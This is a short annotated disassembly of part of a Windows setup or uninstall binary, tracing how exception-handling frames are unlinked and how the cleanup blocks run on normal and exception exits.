00407A81 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX ; result = buffer+4 value
00407A84 |. EB 07 JMP SHORT setup_un.00407A8D
00407A86 |> C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1 ; result = -1 on failure
00407A8D |> 33C0 XOR EAX,EAX ; normal exit from the inner guarded region
00407A8F |. 5A POP EDX ; EDX = saved previous FS:[0]
00407A90 |. 59 POP ECX ; discard handler address
00407A91 |. 59 POP ECX ; discard saved EBP
00407A92 |. 64:8910 MOV DWORD PTR FS:[EAX],EDX ; unlink inner frame
00407A95 |. 68 AD7A4000 PUSH setup_un.00407AAD ; address the RETN at 00407AA5 will return to
00407A9A |> 8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C] ; inner cleanup block (also entered from 00407AAB)
00407AA0 |. E8 7FFBFFFF CALL setup_un.00407624 ; releases whatever 00407640 opened - presumably; TODO confirm
00407AA5 \. C3 RETN ; continues at the address pushed before entering this block
00407AA6 .^ E9 B9BBFFFF JMP setup_un.00403664 ; inner handler stub: shared routine, also used at 00407ACC and 00407A1C
00407AAB .^ EB ED JMP SHORT setup_un.00407A9A ; exception path re-enters the inner cleanup block
00407AAD . 33C0 XOR EAX,EAX ; normal exit from the outer guarded region
00407AAF . 5A POP EDX
00407AB0 . 59 POP ECX
00407AB1 . 59 POP ECX
00407AB2 . 64:8910 MOV DWORD PTR FS:[EAX],EDX ; unlink outer frame
00407AB5 . 68 D37A4000 PUSH setup_un.00407AD3 ; address the RETN at 00407ACB will return to
00407ABA > 8D85 A4FEFFFF LEA EAX,DWORD PTR SS:[EBP-15C] ; outer cleanup block (also entered from 00407AD1)
00407AC0 . 8B15 A0754000 MOV EDX,DWORD PTR DS:[4075A0] ; setup_un.004075A4 - same value as passed to 00404414
00407AC6 . E8 0DCAFFFF CALL setup_un.004044D8 ; counterpart of the 00404414 call - presumably finalises the buffer; TODO confirm
00407ACB . C3 RETN
00407ACC .^ E9 93BBFFFF JMP setup_un.00403664 ; outer handler stub
00407AD1 .^ EB E7 JMP SHORT setup_un.00407ABA ; exception path re-enters the outer cleanup block
00407AD3 . 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] ; return value = result slot
00407AD6 . 5B POP EBX
00407AD7 . 8BE5 MOV ESP,EBP
00407AD9 . 5D POP EBP
00407ADA . C3 RETN
00407ADB 90 NOP
00407ADC $ 55 PUSH EBP
00407ADD . 8BEC MOV EBP,ESP
00407ADF . 6A 00 PUSH 0
00407AE1 . 6A 00 PUSH 0
00407AE3 . 6A 00 PUSH 0
00407AE5 . 53 PUSH EBX
00407AE6 . 56 PUSH ESI
00407AE7 . 57 PUSH EDI